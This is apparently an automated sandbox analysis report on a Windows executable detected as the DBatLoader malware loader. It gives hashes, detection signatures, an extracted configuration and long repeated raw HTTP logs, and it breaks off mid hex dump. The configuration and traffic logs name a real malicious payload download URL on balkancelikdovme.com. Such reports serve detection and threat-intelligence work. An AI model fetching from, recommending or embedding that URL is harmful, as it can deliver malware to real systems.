Edit tour

Windows Analysis Report
r096teIe1H.exe

Overview

General Information

Sample Name:	r096teIe1H.exe
Original Sample Name:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841.exe
Analysis ID:	1296092
MD5:	b1e794e29881f56a4e9afa213d7c622d
SHA1:	7f5991e1e24a29eff5fad62b33e05fcff2eb0988
SHA256:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841
Tags:	exeRemcosRAT
Infos:

Detection

DBatLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Yara detected DBatLoader

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to launch a process as a different user

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Classification

Process Tree

System is w10x64

r096teIe1H.exe (PID: 6960 cmdline: C:\Users\user\Desktop\r096teIe1H.exe MD5: B1E794E29881F56A4E9AFA213D7C622D)

WerFault.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6960 -s 1444 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": "http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
r096teIe1H.exe	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.r096teIe1H.exe.237056c.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.r096teIe1H.exe.32a0000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.r096teIe1H.exe.237056c.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.0.r096teIe1H.exe.400000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: r096teIe1H.exe

Malware Configuration Extractor: DBatLoader {"Download Url": "http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk"}

Multi AV Scanner detection for submitted file

Source: r096teIe1H.exe	ReversingLabs: Detection: 73%
Source: r096teIe1H.exe	Virustotal: Detection: 33%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: r096teIe1H.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://balkancelikdovme.com/llg	Avira URL Cloud: Label: malware
Source: http://balkancelikdovme.com/	Avira URL Cloud: Label: malware
Source: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveks	Avira URL Cloud: Label: malware
Source: http://balkancelikdovme.com/llb	Avira URL Cloud: Label: malware
Source: http://balkancelikdovme.com/lln	Avira URL Cloud: Label: malware
Source: http://balkancelikdovme.com/ll	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: balkancelikdovme.com

Virustotal: Detection: 17%

Perma Link

Machine Learning detection for sample

Source: r096teIe1H.exe

Joe Sandbox ML: detected

Source: r096teIe1H.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032A58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_032A58CC

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk

Source: Joe Sandbox View

ASN Name: GYRONGB GYRONGB

Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:02 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:02 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:02 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:02 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:03 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 